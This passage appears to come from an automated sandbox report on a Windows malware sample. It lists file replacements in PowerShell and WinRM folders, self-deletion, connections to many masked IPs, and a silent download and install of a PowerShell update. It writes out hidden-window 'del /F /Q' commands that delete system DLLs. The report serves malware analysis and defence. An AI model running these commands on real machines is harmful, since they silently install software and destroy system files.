  • from <SYSTEM32>\windowspowershell\v1.0\modules\bitstransfer\en\setc3.tmp to <SYSTEM32>\windowspowershell\v1.0\modules\bitstransfer\en\about_bits_cmdlets.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\examples\setbb.tmp to <SYSTEM32>\windowspowershell\v1.0\examples\profile.ps1
  • from %WINDIR%\$968930uinstall_kb968930$\setbc.tmp to %WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe
  • from %WINDIR%\help\setc4.tmp to %WINDIR%\help\windowspowershellhelp.chm
  • from <SYSTEM32>\windowspowershell\v1.0\setc7.tmp to <SYSTEM32>\windowspowershell\v1.0\microsoft.powershell.editor.dll
  • from <SYSTEM32>\windowspowershell\v1.0\setc8.tmp to <SYSTEM32>\windowspowershell\v1.0\microsoft.powershell.graphicalhost.dll
  • from <SYSTEM32>\windowspowershell\v1.0\setc9.tmp to <SYSTEM32>\windowspowershell\v1.0\powershell_ise.exe
  • from <SYSTEM32>\windowspowershell\v1.0\setca.tmp to <SYSTEM32>\windowspowershell\v1.0\microsoft.powershell.gpowershell.resources.dll
  • from <SYSTEM32>\windowspowershell\v1.0\setcb.tmp to <SYSTEM32>\windowspowershell\v1.0\microsoft.powershell.editor.resources.dll
  • from <SYSTEM32>\windowspowershell\v1.0\setcc.tmp to <SYSTEM32>\windowspowershell\v1.0\microsoft.powershell.graphicalhost.resources.dll
  • from <SYSTEM32>\windowspowershell\v1.0\setcd.tmp to <SYSTEM32>\windowspowershell\v1.0\powershell_ise.resources.dll
  • from <SYSTEM32>\windowspowershell\v1.0\setc5.tmp to <SYSTEM32>\windowspowershell\v1.0\compiledcomposition.microsoft.powershell.gpowershell.dll
  • from <SYSTEM32>\windowspowershell\v1.0\setc6.tmp to <SYSTEM32>\windowspowershell\v1.0\microsoft.powershell.gpowershell.dll
  • from <SYSTEM32>\windowspowershell\v1.0\setba.tmp to <SYSTEM32>\windowspowershell\v1.0\default.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\setb8.tmp to <SYSTEM32>\windowspowershell\v1.0\about_wmi_cmdlets.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set5e.tmp to <SYSTEM32>\windowspowershell\v1.0\system.management.automation.dll-help.xml
  • from <SYSTEM32>\windowspowershell\v1.0\seta7.tmp to <SYSTEM32>\windowspowershell\v1.0\about_script_internationalization.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\seta8.tmp to <SYSTEM32>\windowspowershell\v1.0\about_session_configurations.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\seta9.tmp to <SYSTEM32>\windowspowershell\v1.0\about_signing.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\setaa.tmp to <SYSTEM32>\windowspowershell\v1.0\about_special_characters.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\setab.tmp to <SYSTEM32>\windowspowershell\v1.0\about_split.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\setac.tmp to <SYSTEM32>\windowspowershell\v1.0\about_switch.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\setad.tmp to <SYSTEM32>\windowspowershell\v1.0\about_throw.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\setae.tmp to <SYSTEM32>\windowspowershell\v1.0\about_transactions.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\setaf.tmp to <SYSTEM32>\windowspowershell\v1.0\about_trap.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\setb0.tmp to <SYSTEM32>\windowspowershell\v1.0\about_try_catch_finally.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\setb1.tmp to <SYSTEM32>\windowspowershell\v1.0\about_types.ps1xml.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\setb2.tmp to <SYSTEM32>\windowspowershell\v1.0\about_type_operators.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\setb3.tmp to <SYSTEM32>\windowspowershell\v1.0\about_variables.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\setb4.tmp to <SYSTEM32>\windowspowershell\v1.0\about_while.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\setb5.tmp to <SYSTEM32>\windowspowershell\v1.0\about_wildcards.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\setb6.tmp to <SYSTEM32>\windowspowershell\v1.0\about_windows_powershell_2.0.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\setb7.tmp to <SYSTEM32>\windowspowershell\v1.0\about_windows_powershell_ise.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\seta3.tmp to <SYSTEM32>\windowspowershell\v1.0\about_return.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\seta5.tmp to <SYSTEM32>\windowspowershell\v1.0\about_scripts.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\seta4.tmp to <SYSTEM32>\windowspowershell\v1.0\about_scopes.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set76.tmp to <SYSTEM32>\windowspowershell\v1.0\about_foreach.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set75.tmp to <SYSTEM32>\windowspowershell\v1.0\about_for.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set74.tmp to <SYSTEM32>\windowspowershell\v1.0\about_execution_policies.help.txt
  • from <SYSTEM32>\winrm\0409\set1c.tmp to <SYSTEM32>\winrm\0409\winrm.ini
  • from <SYSTEM32>\windowspowershell\v1.0\set37.tmp to <SYSTEM32>\windowspowershell\v1.0\certificate.format.ps1xml
  • from <SYSTEM32>\windowspowershell\v1.0\set38.tmp to <SYSTEM32>\windowspowershell\v1.0\diagnostics.format.ps1xml
  • from <SYSTEM32>\windowspowershell\v1.0\set39.tmp to <SYSTEM32>\windowspowershell\v1.0\dotnettypes.format.ps1xml
  • from <SYSTEM32>\windowspowershell\v1.0\set3a.tmp to <SYSTEM32>\windowspowershell\v1.0\filesystem.format.ps1xml
  • from <SYSTEM32>\windowspowershell\v1.0\set3b.tmp to <SYSTEM32>\windowspowershell\v1.0\help.format.ps1xml
  • from <SYSTEM32>\grouppolicy\adm\set19.tmp to <SYSTEM32>\grouppolicy\adm\windowsremotemanagement.adm
  • from <SYSTEM32>\windowspowershell\v1.0\set3c.tmp to <SYSTEM32>\windowspowershell\v1.0\microsoft.powershell.commands.diagnostics.dll
  • from <SYSTEM32>\grouppolicy\adm\set1b.tmp to <SYSTEM32>\grouppolicy\adm\eventforwarding.adm
  • from <SYSTEM32>\windowspowershell\v1.0\set3e.tmp to <SYSTEM32>\windowspowershell\v1.0\microsoft.powershell.commands.utility.dll
  • from <SYSTEM32>\windowspowershell\v1.0\set40.tmp to <SYSTEM32>\windowspowershell\v1.0\microsoft.powershell.security.dll
  • from <SYSTEM32>\windowspowershell\v1.0\set41.tmp to <SYSTEM32>\windowspowershell\v1.0\microsoft.wsman.runtime.dll
  • from <SYSTEM32>\windowspowershell\v1.0\set42.tmp to <SYSTEM32>\windowspowershell\v1.0\microsoft.wsman.management.dll
  • from <SYSTEM32>\windowspowershell\v1.0\set43.tmp to <SYSTEM32>\windowspowershell\v1.0\microsoft.backgroundintelligenttransfer.management.dll
  • from <SYSTEM32>\windowspowershell\v1.0\set44.tmp to <SYSTEM32>\windowspowershell\v1.0\powershell.exe
  • from <SYSTEM32>\windowspowershell\v1.0\set45.tmp to <SYSTEM32>\windowspowershell\v1.0\powershellcore.format.ps1xml
  • from <SYSTEM32>\windowspowershell\v1.0\set3d.tmp to <SYSTEM32>\windowspowershell\v1.0\microsoft.powershell.commands.management.dll
  • from %WINDIR%\inf\set18.tmp to %WINDIR%\inf\windowsremoteshell.adm
  • from <SYSTEM32>\windowspowershell\v1.0\set3f.tmp to <SYSTEM32>\windowspowershell\v1.0\microsoft.powershell.consolehost.dll
  • from %WINDIR%\inf\set17.tmp to %WINDIR%\inf\windowsremotemanagement.adm
  • from <SYSTEM32>\set16.tmp to <SYSTEM32>\wevtfwd.dll
  • from <SYSTEM32>\wbem\set3.tmp to <SYSTEM32>\wbem\wsmauto.mof
  • from <SYSTEM32>\set5.tmp to <SYSTEM32>\wsmtxt.xsl
  • from <SYSTEM32>\set6.tmp to <SYSTEM32>\winrm.cmd
  • from <SYSTEM32>\set7.tmp to <SYSTEM32>\winrm.vbs
  • from <SYSTEM32>\set8.tmp to <SYSTEM32>\wsmauto.dll
  • from <SYSTEM32>\set9.tmp to <SYSTEM32>\wsmsvc.dll
  • from <SYSTEM32>\seta.tmp to <SYSTEM32>\wsmwmipl.dll
  • from <SYSTEM32>\setb.tmp to <SYSTEM32>\wsmres.dll
  • from <SYSTEM32>\setc.tmp to <SYSTEM32>\winrs.exe
  • from <SYSTEM32>\set4.tmp to <SYSTEM32>\wsmpty.xsl
  • from <SYSTEM32>\setd.tmp to <SYSTEM32>\winrshost.exe
  • from <SYSTEM32>\setf.tmp to <SYSTEM32>\winrsmgr.dll
  • from <SYSTEM32>\set10.tmp to <SYSTEM32>\winrssrv.dll
  • from <SYSTEM32>\set11.tmp to <SYSTEM32>\wsmanhttpconfig.exe
  • from <SYSTEM32>\set12.tmp to <SYSTEM32>\wsmplpxy.dll
  • from <SYSTEM32>\set13.tmp to <SYSTEM32>\winrmprov.dll
  • from <SYSTEM32>\set14.tmp to <SYSTEM32>\winrmprov.mof
  • from <SYSTEM32>\set15.tmp to <SYSTEM32>\wsmprovhost.exe
  • from <SYSTEM32>\windowspowershell\v1.0\set46.tmp to <SYSTEM32>\windowspowershell\v1.0\powershelltrace.format.ps1xml
  • from <SYSTEM32>\sete.tmp to <SYSTEM32>\winrscmd.dll
  • from <SYSTEM32>\windowspowershell\v1.0\set47.tmp to <SYSTEM32>\windowspowershell\v1.0\pwrshmsg.dll
  • from <SYSTEM32>\grouppolicy\adm\set1a.tmp to <SYSTEM32>\grouppolicy\adm\windowsremoteshell.adm
  • from <SYSTEM32>\windowspowershell\v1.0\set48.tmp to <SYSTEM32>\windowspowershell\v1.0\pwrshsip.dll
  • from <SYSTEM32>\windowspowershell\v1.0\set61.tmp to <SYSTEM32>\windowspowershell\v1.0\about_aliases.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set63.tmp to <SYSTEM32>\windowspowershell\v1.0\about_arrays.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set64.tmp to <SYSTEM32>\windowspowershell\v1.0\about_assignment_operators.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set65.tmp to <SYSTEM32>\windowspowershell\v1.0\about_automatic_variables.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set66.tmp to <SYSTEM32>\windowspowershell\v1.0\about_break.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set67.tmp to <SYSTEM32>\windowspowershell\v1.0\about_command_precedence.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set68.tmp to <SYSTEM32>\windowspowershell\v1.0\about_command_syntax.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set69.tmp to <SYSTEM32>\windowspowershell\v1.0\about_comment_based_help.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set6a.tmp to <SYSTEM32>\windowspowershell\v1.0\about_commonparameters.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set6b.tmp to <SYSTEM32>\windowspowershell\v1.0\about_comparison_operators.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set6c.tmp to <SYSTEM32>\windowspowershell\v1.0\about_continue.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set6d.tmp to <SYSTEM32>\windowspowershell\v1.0\about_core_commands.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set6e.tmp to <SYSTEM32>\windowspowershell\v1.0\about_data_sections.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set6f.tmp to <SYSTEM32>\windowspowershell\v1.0\about_debuggers.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set70.tmp to <SYSTEM32>\windowspowershell\v1.0\about_do.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set71.tmp to <SYSTEM32>\windowspowershell\v1.0\about_environment_variables.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set72.tmp to <SYSTEM32>\windowspowershell\v1.0\about_escape_characters.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set73.tmp to <SYSTEM32>\windowspowershell\v1.0\about_eventlogs.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set60.tmp to <SYSTEM32>\windowspowershell\v1.0\importallmodules.psd1
  • from <SYSTEM32>\windowspowershell\v1.0\set49.tmp to <SYSTEM32>\windowspowershell\v1.0\pspluginwkr.dll
  • from <SYSTEM32>\windowspowershell\v1.0\set62.tmp to <SYSTEM32>\windowspowershell\v1.0\about_arithmetic_operators.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\setb9.tmp to <SYSTEM32>\windowspowershell\v1.0\about_ws-management_cmdlets.help.txt
  • from %ALLUSERSPROFILE%\start menu\programs\accessories\windows powershell\windows powershell.lnk to %ALLUSERSPROFILE%\start menu\programs\accessories\windows powershell\@.lnk
  • from <SYSTEM32>\windowspowershell\v1.0\set5d.tmp to <SYSTEM32>\windowspowershell\v1.0\microsoft.backgroundintelligenttransfer.management.resources.dll
  • from <SYSTEM32>\windowspowershell\v1.0\set4b.tmp to <SYSTEM32>\windowspowershell\v1.0\system.management.automation.dll
  • from <SYSTEM32>\windowspowershell\v1.0\set4c.tmp to <SYSTEM32>\windowspowershell\v1.0\getevent.types.ps1xml
  • from <SYSTEM32>\windowspowershell\v1.0\set4d.tmp to <SYSTEM32>\windowspowershell\v1.0\types.ps1xml
  • from <SYSTEM32>\windowspowershell\v1.0\set4e.tmp to <SYSTEM32>\windowspowershell\v1.0\wsman.format.ps1xml
  • from <SYSTEM32>\windowspowershell\v1.0\set4f.tmp to <SYSTEM32>\windowspowershell\v1.0\wtrinstaller.ico
  • from <SYSTEM32>\windowspowershell\v1.0\set50.tmp to <SYSTEM32>\windowspowershell\v1.0\microsoft.powershell.commands.management.dll-help.xml
  • from <SYSTEM32>\windowspowershell\v1.0\set51.tmp to <SYSTEM32>\windowspowershell\v1.0\microsoft.powershell.commands.utility.dll-help.xml
  • from <SYSTEM32>\windowspowershell\v1.0\set52.tmp to <SYSTEM32>\windowspowershell\v1.0\microsoft.powershell.consolehost.dll-help.xml
  • from <SYSTEM32>\windowspowershell\v1.0\set4a.tmp to <SYSTEM32>\windowspowershell\v1.0\registry.format.ps1xml
  • from <SYSTEM32>\windowspowershell\v1.0\set53.tmp to <SYSTEM32>\windowspowershell\v1.0\microsoft.powershell.security.dll-help.xml
  • from <SYSTEM32>\windowspowershell\v1.0\set55.tmp to <SYSTEM32>\windowspowershell\v1.0\microsoft.powershell.commands.diagnostics.resources.dll
  • from <SYSTEM32>\windowspowershell\v1.0\set56.tmp to <SYSTEM32>\windowspowershell\v1.0\microsoft.powershell.commands.diagnostics.dll-help.xml
  • from <SYSTEM32>\windowspowershell\v1.0\set57.tmp to <SYSTEM32>\windowspowershell\v1.0\microsoft.powershell.commands.management.resources.dll
  • from <SYSTEM32>\windowspowershell\v1.0\set58.tmp to <SYSTEM32>\windowspowershell\v1.0\microsoft.powershell.commands.utility.resources.dll
  • from <SYSTEM32>\windowspowershell\v1.0\set59.tmp to <SYSTEM32>\windowspowershell\v1.0\microsoft.powershell.consolehost.resources.dll
  • from <SYSTEM32>\windowspowershell\v1.0\set5a.tmp to <SYSTEM32>\windowspowershell\v1.0\microsoft.powershell.security.resources.dll
  • from <SYSTEM32>\windowspowershell\v1.0\set5b.tmp to <SYSTEM32>\windowspowershell\v1.0\microsoft.wsman.management.resources.dll
  • from <SYSTEM32>\windowspowershell\v1.0\set5c.tmp to <SYSTEM32>\windowspowershell\v1.0\system.management.automation.resources.dll
  • from <SYSTEM32>\windowspowershell\v1.0\set54.tmp to <SYSTEM32>\windowspowershell\v1.0\microsoft.wsman.management.dll-help.xml
  • from <SYSTEM32>\windowspowershell\v1.0\set5f.tmp to <SYSTEM32>\windowspowershell\v1.0\powershell.exe.mui
  • from %WINDIR%\security\edbtmp.log to %WINDIR%\security\edb.log
Substitutes the following files
  • %HOMEPATH%\Cookies\user@bing[1].txt
  • %ALLUSERSPROFILE%\start menu\programs\accessories\windows powershell\@.lnk
  • %ALLUSERSPROFILE%\start menu\programs\accessories\windows powershell\windows powershell.lnk
  • <SYSTEM32>\winrm\0409\winrm.ini
  • <SYSTEM32>\grouppolicy\adm\eventforwarding.adm
  • <SYSTEM32>\grouppolicy\adm\windowsremoteshell.adm
  • <SYSTEM32>\grouppolicy\adm\windowsremotemanagement.adm
  • %WINDIR%\inf\windowsremoteshell.adm
  • %WINDIR%\inf\windowsremotemanagement.adm
  • <SYSTEM32>\wevtfwd.dll
  • <SYSTEM32>\wsmprovhost.exe
  • <SYSTEM32>\winrmprov.mof
  • <SYSTEM32>\winrmprov.dll
  • <SYSTEM32>\wsmplpxy.dll
  • <SYSTEM32>\wsmanhttpconfig.exe
  • <SYSTEM32>\winrssrv.dll
  • <SYSTEM32>\winrsmgr.dll
  • <SYSTEM32>\winrscmd.dll
  • <SYSTEM32>\winrshost.exe
  • <SYSTEM32>\winrs.exe
  • <SYSTEM32>\wsmres.dll
  • <SYSTEM32>\wsmwmipl.dll
  • <SYSTEM32>\wsmsvc.dll
  • <SYSTEM32>\wsmauto.dll
  • <SYSTEM32>\winrm.vbs
  • <SYSTEM32>\winrm.cmd
  • <SYSTEM32>\wsmtxt.xsl
  • <SYSTEM32>\wsmpty.xsl
  • <SYSTEM32>\wbem\wsmauto.mof
  • %HOMEPATH%\cookies\user@bing[2].txt
  • %ALLUSERSPROFILE%\start menu\programs\accessories\windows powershell\windows powershell ise.lnk
  • %WINDIR%\security\edbtmp.log
Deletes itself.
Network activity
Connects to
  • '24#.#64.72.79':80
  • '53.##3.135.93':443
  • '12#.#4.48.191':443
  • '11.##9.184.82':80
  • '16#.#86.183.166':80
  • '15#.#6.13.231':80
  • '20#.#.244.68':80
  • '52.##7.242.222':443
  • '21#.#1.30.149':8080
  • '43.##7.73.69':80
  • '62.##6.88.142':80
  • '18#.#53.153.19':443
  • '27.##4.65.154':443
  • '21#.#87.56.94':80
  • '20#.#21.237.246':443
  • '68.##5.242.112':80
  • '14#.#4.243.41':80
  • '25#.#4.244.196':443
  • '24.##6.173.253':80
  • '13.##.66.141':8080
  • '7.###.215.117':443
  • '21#.#4.30.68':80
  • '18#.#8.123.75':80
  • '45.##6.102.200':443
  • '77.##5.174.145':443
  • '25#.#15.55.222':80
  • '22#.#4.38.158':80
  • '7.###.254.139':443
  • '24#.#9.206.7':80
  • '16#.#40.69.75':80
  • '19.#.151.255':443
  • '19#.#2.17.49':80
  • '13#.#9.179.68':80
  • '10#.#1.82.179':443
  • '21#.#1.96.127':80
  • '21#.#80.229.42':443
  • '24#.#08.121.165':443
  • '11#.#37.167.27':443
  • '10.##8.68.103':80
  • '62.##.166.44':80
  • '10#.#50.48.202':443
  • '10#.#68.59.83':443
  • '86.#.219.105':80
  • '19#.#43.166.216':443
  • '14#.#81.119.83':80
  • '41.##7.218.84':80
  • '20#.#33.76.16':8080
  • '40.##.117.153':80
  • '18#.#01.25.84':80
  • '21#.#33.9.29':80
  • '45.##7.167.60':80
  • '75.##5.215.164':443
  • '45.##9.91.156':80
  • '25#.#57.3.75':443
  • '90.##.158.165':80
  • '23#.#54.57.188':443
  • '23#.#86.131.126':80
  • '37.##.19.181':80
  • '16#.#2.130.25':8080
  • '93.##8.115.52':80
  • '16#.#92.218.146':443
  • '25#.#6.127.139':443
  • '61.##.249.78':80
  • '46.#80.10.2':80
  • '20#.#76.237.74':443
  • '27.##.88.241':443
  • '14#.#5.36.184':8080
  • '23#.#72.143.21':80
  • '16#.#6.100.169':80
  • '95.#.124.148':80
  • '19#.#39.6.199':80
  • '25.##1.185.90':80
  • '30.##.63.131':80
  • '29.##0.90.45':80
  • '25#.16.89.5':80
  • '11#.#8.37.190':443
  • '10#.#3.66.226':443
  • '22#.#0.133.138':443
  • '17#.#0.70.98':443
  • '10#.#46.255.101':443
  • '86.#.117.65':8080
  • '15#.#01.102.228':443
  • '25.##7.1.197':80
  • '22.#0.88.8':443
  • '41.##8.121.170':443
  • '7.###.177.232':80
  • '19#.#51.122.214':443
  • '13#.#1.56.37':443
  • '15#.#7.136.145':80
  • '23#.#14.194.131':80
  • '99.##.207.205':443
  • '16#.#8.191.228':80
  • '19#.#3.48.171':80
  • '12#.#.147.215':443
  • '23#.#93.239.99':443
TCP
HTTP GET requests
  • http://microsoft.com/
  • http://ya##o.com/
  • http://bing.com/
  • http://www.bing.com/
  • http://download.microsoft.com/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe
UDP
  • DNS ASK microsoft.com
  • DNS ASK ya##o.com
  • DNS ASK bing.com
  • DNS ASK download.microsoft.com
Miscellaneous
Searches for the following windows
  • ClassName: 'STUFF-BOOT' WindowName: ''
Creates and executes the following
  • '%TEMP%\windowsxp-kb968930-x86-eng.exe' /quiet /norestart
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.WSMan.Management.dll"
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.WSMan.Runtime.dll"
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.PowerShell.Commands.Diagnostics.dll"
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.PowerShell.Security.dll"
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.PowerShell.Commands.Utility.dll"
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.PowerShell.Commands.Management.dll"
  • '<SYSTEM32>\wsmanhttpconfig.exe' downlevelsetup
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\System.Management.Automation.dll"
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\.\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll"
  • '<SYSTEM32>\wsmanhttpconfig.exe' install
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\.\Microsoft.PowerShell.Security.resources.dll"
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /addenvvariable PATH "<SYSTEM32>\WindowsPowerShell\v1.0"
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /addenvvariable PATHEXT ".PSC1"
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.BackgroundIntelligentTransfer.Management.dll"
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.PowerShell.ConsoleHost.dll"
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\.\System.Management.Automation.resources.dll"
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\.\Microsoft.PowerShell.Editor.resources.dll"
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.PowerShell.GPowerShell.dll"
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\.\Microsoft.PowerShell.GraphicalHost.resources.dll"
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\.\Microsoft.PowerShell.GPowerShell.resources.dll"
  • 'D:\f6aa1af8feadf402f6eb6457618ba2\update\update.exe' /quiet /norestart
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\.\Microsoft.PowerShell.Commands.Diagnostics.resources.dll"
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.PowerShell.Editor.dll"
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /wmsettingchange
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\.\Microsoft.PowerShell.Commands.Utility.resources.dll"
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\.\Microsoft.WSMan.Management.resources.dll"
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\.\Microsoft.PowerShell.Commands.Management.resources.dll"
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\.\Microsoft.PowerShell.ConsoleHost.resources.dll"
  • '%WINDIR%\$968930uinstall_kb968930$\pssetupnativeutils.exe' "<SYSTEM32>\WindowsPowerShell\v1.0\PowerShell.exe" "Accessories\Windows PowerShell\Windows PowerShell.lnk"
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.PowerShell.GraphicalHost.dll"
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\.\Microsoft.PowerShell.GraphicalHost.resources.dll""' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\.\Microsoft.PowerShell.ConsoleHost.resources.dll""' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.PowerShell.GraphicalHost.dll""' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.PowerShell.Commands.Management.dll""' (with hidden window)
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\.\Microsoft.PowerShell.GPowerShell.resources.dll"' (with hidden window)
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"' (with hidden window)
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\.\Microsoft.PowerShell.Commands.Diagnostics.resources.dll"' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.PowerShell.Commands.Utility.dll""' (with hidden window)
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\.\Microsoft.PowerShell.Editor.resources.dll"' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\.\Microsoft.PowerShell.Commands.Utility.resources.dll""' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.PowerShell.Security.dll""' (with hidden window)
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\.\Microsoft.PowerShell.Commands.Management.resources.dll""' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.PowerShell.ConsoleHost.dll""' (with hidden window)
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\.\Microsoft.PowerShell.Editor.resources.dll""' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\System.Management.Automation.dll""' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.PowerShell.GPowerShell.dll""' (with hidden window)
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\.\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll"' (with hidden window)
